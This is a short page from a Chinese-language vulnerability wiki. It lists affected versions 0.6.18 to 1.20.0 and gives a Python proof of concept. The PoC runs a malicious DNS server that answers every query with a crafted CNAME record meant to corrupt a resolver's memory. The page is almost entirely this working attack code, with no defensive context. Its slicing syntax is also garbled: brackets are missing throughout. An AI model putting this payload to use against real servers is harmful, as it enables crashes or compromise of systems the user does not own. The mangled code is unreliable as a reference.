免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
影响版本
0.6.18 - 1.20.0
POC
from binascii import hexlify, unhexlify
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack
sock = socket(AF_INET, SOCK_DGRAM)
sock.bind(('0.0.0.0', 1053))
while True:
request, addr = sock.recvfrom(4096)
print(b'<<< '+hexlify(request))
ident = request0:2
# find request
nullptr = request.find(0x0,12)
reqname = request12:request.find(0x0,12)+1
reqtype = requestnullptr+1:nullptr+3
reqclass = requestnullptr+3:nullptr+5
print('name: %s, type: %s, class: %s' % (reqname, unpack('>H', reqtype), unpack('>H', reqclass)))
# CNAME response
response = request0:2 + \
unhexlify('''81800001000100000000''') + \
reqname + reqtype + reqclass + \
unhexlify('c00c0005000100000e10000b18414141414141414141414141414141414141414141414141c004')
print(b'>>> '+hexlify(response))
sock.sendto(bytes(response), addr)
免费、自由、人人可编辑的漏洞库--pwnwiki.com
